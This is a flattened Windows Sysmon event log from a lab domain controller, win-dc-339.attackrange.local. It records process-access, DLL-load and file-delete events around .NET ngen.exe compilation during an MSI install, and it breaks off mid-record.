10341000x800000000000000073873Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.468{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-190C-00000000BB01}4924C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073872Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.452{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-180C-00000000BB01}6700c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073871Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.452{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD1-607E-180C-00000000BB01}6700c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073870Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.452{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-160C-00000000BB01}4320c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073869Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.452{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-160C-00000000BB01}4320c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073868Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.452{A7A01FEF-EBD1-607E-160C-00000000BB01}4320C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000073867Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.421{A7A01FEF-EBD1-607E-170C-00000000BB01}69005332C:\Windows\system32\conhost.exe{A7A01FEF-EBD1-607E-160C-00000000BB01}4320c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073866Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.421{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-170C-00000000BB01}6900C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073865Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.421{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-160C-00000000BB01}4320c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073864Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.421{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD1-607E-160C-00000000BB01}4320c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073863Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.405{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-140C-00000000BB01}5392c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073862Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.405{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-140C-00000000BB01}5392c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073861Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.405{A7A01FEF-EBD1-607E-140C-00000000BB01}5392C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 23542300x800000000000000073860Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.405{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9414F83788BF748BE35C812B101FBCA6,SHA256=D2FA9FDBEBB436735F917B74E4E07D0F9D19926C71D9F67C0CC81C9C770104E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073859Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.405{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C08339E6EDA609661A91D2EE5F84BD0,SHA256=85C488E0A35FCFA91CC74AAA21BD7EF2DE892B5CC053AAFCD2CD0E4E634DA9DB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000073858Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.390{A7A01FEF-EBD1-607E-150C-00000000BB01}47766568C:\Windows\system32\conhost.exe{A7A01FEF-EBD1-607E-140C-00000000BB01}5392c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073857Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.374{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-150C-00000000BB01}4776C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073856Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.374{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-140C-00000000BB01}5392c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073855Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.374{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD1-607E-140C-00000000BB01}5392c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073854Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.358{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-120C-00000000BB01}6428c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073853Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.358{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-120C-00000000BB01}6428c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073852Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.358{A7A01FEF-EBD1-607E-120C-00000000BB01}6428C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000073851Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.343{A7A01FEF-EBD1-607E-130C-00000000BB01}21242528C:\Windows\system32\conhost.exe{A7A01FEF-EBD1-607E-120C-00000000BB01}6428c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073850Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.343{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-130C-00000000BB01}2124C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073849Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.327{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-120C-00000000BB01}6428c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073848Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.327{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD1-607E-120C-00000000BB01}6428c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073847Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.327{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-100C-00000000BB01}4984c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073846Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.327{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-100C-00000000BB01}4984c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073845Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.327{A7A01FEF-EBD1-607E-100C-00000000BB01}4984C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000073844Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.311{A7A01FEF-EBD1-607E-110C-00000000BB01}58405296C:\Windows\system32\conhost.exe{A7A01FEF-EBD1-607E-100C-00000000BB01}4984c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073843Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.296{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-110C-00000000BB01}5840C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073842Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.296{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-100C-00000000BB01}4984c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073841Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.296{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD1-607E-100C-00000000BB01}4984c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073840Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 